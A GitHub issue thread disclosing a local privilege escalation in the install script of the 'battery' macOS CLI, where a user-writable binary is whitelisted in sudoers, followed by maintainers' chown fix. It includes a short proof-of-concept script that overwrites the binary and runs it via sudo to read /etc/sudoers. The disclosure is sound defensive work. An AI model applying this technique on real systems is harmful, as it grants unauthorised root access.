Security issue: CLI install script allows for local privilege escalation

[milopiccolo]

Summary

Installing following 'Option 3: install ONLY the command line interface' creates a security hole on the system that allows code executed with the installing user's permissions to gain superuser permissions.

The install script here creates a sudoers.d entry that allows any user to execute /usr/local/bin/smc as superuser.

This would be fine in itself, but the install script also installs /usr/local/bin/smc as user-writable.

Sample PoC:

First, install normally

milo@Michaels-MacBook-Air:~/battery$ curl -s https://raw.githubusercontent.com/actuallymentor/battery/main/setup.sh > setup.sh
milo@Michaels-MacBook-Air:~/battery$ chmod u+x setup.sh
milo@Michaels-MacBook-Air:~/battery$ ./setup.sh

####################################################################
# 👋 Welcome, this is the setup script for the battery CLI tool.
# Note: this script will ask for your password once or multiple times.
####################################################################


🔋 Starting battery installation
[ 1 ] Superuser permissions acquired.
[ 2 ] Downloading latest version of battery CLI
[ 3 ] Move smc to executable folder
[ 4 ] Writing script to /usr/local/bin/battery for user milo
[ 5 ] Setting correct file permissions for milo
[ 6 ] Setting up visudo declarations
01/31/26-12:52:49 - Setting visudo file permissions to milo
Visudo file updated successfully
[ 7 ] Removing temp folder /Users/milo/.battery-tmp

🎉 Battery tool installed. Type "battery help" for instructions.

Create a sample script that can perform privilege escalation

milo@Michaels-MacBook-Air:~/battery$ vim sample-evil-script.sh
milo@Michaels-MacBook-Air:~/battery$ chmod u+x sample-evil-script.sh
milo@Michaels-MacBook-Air:~/battery$ cat sample-evil-script.sh
echo -e "#!/bin/bash\ncat /etc/sudoers | wc" > /usr/local/bin/smc
sudo /usr/local/bin/smc -k CH0B -w 02
milo@Michaels-MacBook-Air:~/battery$ ./sample-evil-script.sh
     64     250    1709

Suggested mitigation

Don't install these binaries as user-writable. But, I haven't looked into the rest of the repo so I don't know what other changes this would entail.

[base47]

@milopiccolo Thank you. Working on the PR.

For everybody who cares the fix is

sudo chown root /usr/local/bin
sudo chown root /usr/local/bin/smc
sudo chown root /usr/local/bin/battery

[base47]

@milopiccolo Please, consider reporting this in some forks as well. At least here https://github.com/js4jiang5/BatteryOptimizer_for_Mac

Full list of forks https://github.com/actuallymentor/battery/forks

[actuallymentor]

Good find. Tag me on the PR when you have it. Thanks for the eyes @milopiccolo

[base47]

The rabbit hole is a bit deeper than described in this issue. Working on it.